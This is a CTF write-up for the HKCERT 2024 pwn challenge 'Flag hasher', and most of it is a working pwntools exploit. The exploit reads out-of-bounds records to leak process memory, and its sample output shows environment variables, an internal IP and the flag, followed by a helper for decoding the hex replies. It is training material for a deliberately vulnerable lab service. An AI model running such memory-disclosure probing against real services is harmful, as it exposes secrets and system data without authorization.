As this chall already has an [official writeup](https://hackmd.io/@blackb6a/hkcert-ctf-2024-ii-en-07128acbc80dd0a4#Pwn-Flag-hasher), please consider this page as some notes on how to build the payload.

1 - Looping the connection

  • index for a linear lookup of the memory’s contents
  • while loop checking whether an error occurs
    • if one occurs, sleep for a moment before reconnecting

2 - Converting the received hash

Pretty straightforward, but there are some pitfalls to avoid due to Python's handling of the bytes type:

  • convert each segment of two bytes to an int, from a base 16 representation
  • convert each int back to a byte using chr, encoded with the charmap encoding to avoid some shenanigans

3 - Final exploit

from pwn import *
import time

r = remote("c55-flag-hasher.hkcert24.pwnable.hk", 1337, ssl=True) 
context.log_level = "critical" # use "debug" for a better understanding of the payload

initial = 150 # starts from this index
idx = initial
server_response = b"" # last raw line received, so the except branch can always print it

def hex_to_ascii(b: bytes) -> bytes:
    intarr = []
    for i in range(0,len(b),2):
        x = int(b[i:i+2],16)
        intarr.append(x)
    res = b''
    for x in intarr:
        res += chr(x).encode('charmap')
    return res

while idx < initial+50: # tries 50 indexes before stopping
    try:
        r.recvuntil(b"2 - Read Hash record\n") # wait until we receive this text... which is when we need to respond
        r.sendline(b'2')                       # and send the command
        r.recvuntil(b"Idx: ")
        r.sendline(str(idx).encode())          # convert `idx` to string, and send it
        idx+=1
        server_response = r.recvline()         # save server response to variable
        hex_output = server_response.split(b" : ")[1].rstrip() # get only the hex part out of the server response
        # print("---",hex_output)
        decrypted = hex_to_ascii(hex_output)
        print("---",decrypted)
    except Exception: # parsing or connection error; Ctrl-C still stops the script
        print("--- server response:",server_response)
        time.sleep(1) # avoids overloading the server with requests, or getting us banned
        r = remote("c55-flag-hasher.hkcert24.pwnable.hk", 1337, ssl=True)

An extract of what you get by executing it:

--- server response: b'Hash - 180 : Segmentation fault\n'
--- b'/home/pwn/chal\x00KUBERNETES_PORT=\x00'
--- server response: b'Entry does not exist.\n'
--- b'KUBERNETES_PORT=\x00KUBERNETES_SERV'
--- b'KUBERNETES_SERVICE_PORT=\x00REMOTE_'
--- b'REMOTE_HOST=10.29.213.112\x00HOSTNA'
--- b'HOSTNAME=chall-0\x00HOME=/root\x00flag'
--- b'HOME=/root\x00flag=hkcert24{A_tRap_'
--- b'flag=hkcert24{A_tRap_1n_1ibC}\x00KU'
--- b'KUBERNETES_PORT_443_TCP_ADDR=\x00PA'
--- b'PATH=/usr/local/sbin:/usr/local/'
--- b'KUBERNETES_PORT_443_TCP_PORT=\x00KU'
--- b'KUBERNETES_PORT_443_TCP_PROTO=\x00K'
--- b'KUBERNETES_SERVICE_PORT_HTTPS=\x00K'
--- b'KUBERNETES_PORT_443_TCP=\x00KUBERNE'
--- b'KUBERNETES_SERVICE_HOST=\x00PWD=/\x00/'
--- server response: b'Hash - 196 : 5057443D2F002F686F6D652F70776E2F6368616C000000000000000000Segmentation fault\n'
--- server response: b'Entry does not exist.\n'
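
An added example (not part of the original notes or the official writeup) for the conversion in step 2: it parses a response line, keeps the hex that arrives fused with an error message as in the `Hash - 196` line of the extract, and shows what `charmap` avoids compared with the default UTF-8. The sample lines and the names `parse_record`, `per_char` and `c_strings` are assumptions made for illustration.

```python
import re

# Line shape taken from the extract above: b"Hash - <idx> : <hex><optional text>\n".
# The hex group only consumes whole pairs, so it stops at the first non-hex byte.
RECORD = re.compile(rb"^Hash - (\d+) : ((?:[0-9A-Fa-f]{2})*)(.*)$", re.DOTALL)

def parse_record(line: bytes):
    """Return (idx, raw_bytes, trailer), or None when the line is not a hash record."""
    m = RECORD.match(line.rstrip(b"\r\n"))
    if m is None:
        return None  # e.g. b"Entry does not exist."
    idx, hex_part, trailer = m.groups()
    # bytes.fromhex builds the bytes directly, so no text encoding is involved at all.
    return int(idx), bytes.fromhex(hex_part.decode("ascii")), trailer

def per_char(hex_str: str, encoding: str) -> bytes:
    """The chr()-based conversion from the notes, with the encoding as a parameter."""
    return b"".join(chr(int(hex_str[i:i + 2], 16)).encode(encoding)
                    for i in range(0, len(hex_str), 2))

def c_strings(raw: bytes):
    """Split a 32-byte window on NUL terminators and drop the empty pieces."""
    return [s for s in raw.split(b"\x00") if s]

# Constructed sample lines: shapes follow the extract, values are made up.
SAMPLES = [
    b"Hash - 7 : 41423D3100E9FF\n",                  # clean record with bytes >= 0x80
    b"Hash - 8 : 5057443D2F00Segmentation fault\n",  # hex fused with an error message
    b"Hash - 9 : Segmentation fault\n",              # record header but no data
    b"Entry does not exist.\n",                      # not a record
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(parse_record(line))
    # charmap keeps one byte per value; UTF-8 expands every value >= 0x80 to two bytes.
    print(per_char("E9FF", "charmap"), per_char("E9FF", "utf-8"))
```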

Please do not hesitate to reach out to me if you have any questions, suggestions or improvements.